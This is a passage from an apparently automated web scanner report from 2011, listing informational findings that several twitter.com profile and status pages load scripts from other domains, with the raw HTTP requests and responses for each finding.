Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOgxjc3JmX2lkIiVmMzE1MDNl%250AMzcxMDU0OWE3YjU2YTE5Zjk1OGRkMDBmMToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--f20b609817e7de3826da0bcc06ca803fab8dec0f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.423. http://twitter.com/gercheq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /gercheq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gercheq HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-54075-30524
ETag: "4793986d74da0ff9abc545ba99de39af"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.27545
Content-Type: text/html; charset=utf-8
Content-Length: 51283
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.424. http://twitter.com/harvardlampoon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /harvardlampoon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /harvardlampoon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265997-31045-3388
ETag: "dd05aa33a38e41399f97d64b699efc32"
Last-Modified: Sat, 29 Jan 2011 01:53:17 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 19877
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/following.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.425. http://twitter.com/j_hollender

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /j_hollender HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-34363-18254
ETag: "ff41031bc88714d0c96acba56a4b58e3"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01703
Content-Type: text/html; charset=utf-8
Content-Length: 50673
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.426. http://twitter.com/j_hollender/status/28168027493105664

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender/status/28168027493105664

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /j_hollender/status/28168027493105664 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225156-94360-8357
ETag: "84873b64a606497b7403aad808e42fd4"
Last-Modified: Fri, 28 Jan 2011 14:32:36 GMT
X-Runtime: 0.05320
Content-Type: text/html; charset=utf-8
Content-Length: 13837
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0Ogxjc3JmX2lkIiVmNzQ5Mzkz%250AMWYyM2YzMGQ1NThkYjM0NmZlNzkyMjEzZDoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--6ab2ae33865a2c4f7847c745caae0631fb3917ad; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.427. http://twitter.com/j_hollender/status/28168027493105664

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender/status/28168027493105664

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /j_hollender/status/28168027493105664 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234639-56743-37156
ETag: "589aef1f4b70bbe1c30fe41dd1dcc2eb"
Last-Modified: Fri, 28 Jan 2011 17:10:39 GMT
X-Runtime: 0.05949
Content-Type: text/html; charset=utf-8
Content-Length: 13706
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0OhVpbl9uZXdfdXNlcl9mbG93%250AMDoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMxMWM6%250ADHR6X25hbWUiFENlbnRyYWwgQW1lcmljYToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--470bd21827f17e58fb320ed6b1c309e93f79096f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.428. http://twitter.com/j_hollender/status/28168027493105664

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender/status/28168027493105664

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /j_hollender/status/28168027493105664 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225019-47017-40660
ETag: "f40d96b3c19b236169916ec226be14ef"
Last-Modified: Fri, 28 Jan 2011 14:30:19 GMT
X-Runtime: 0.05160
Content-Type: text/html; charset=utf-8
Content-Length: 13838
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0Ogxjc3JmX2lkIiU5OTJjOGJk%250AOGYzZTA0NDA4Y2Q1Y2MwMTkzZTZhMTliZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--3734fcc51205696679bb42e413a9322e748617b9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.429. http://twitter.com/j_hollender/status/28175738595180544

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender/status/28175738595180544

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /j_hollender/status/28175738595180544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225018-12254-34367
ETag: "61544e0c3acbf3bd257ae209a889c048"
Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT
X-Runtime: 0.04377
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTc1NzM4NTk1MTgwNTQ0Ogxjc3JmX2lkIiU2ZGExNWUw%250AMGMyZWNjNjJjMzIzODFhMjU5NmZkNTkzZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--49158f0023a784432eb325042f2a8c5b699ba833; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.430. http://twitter.com/j_hollender/status/28175738595180544

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender/status/28175738595180544

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /j_hollender/status/28175738595180544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225151-48925-24449
ETag: "ca8cebc6f4a0a7e3923f1bc3d858670a"
Last-Modified: Fri, 28 Jan 2011 14:32:31 GMT
X-Runtime: 0.07727
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
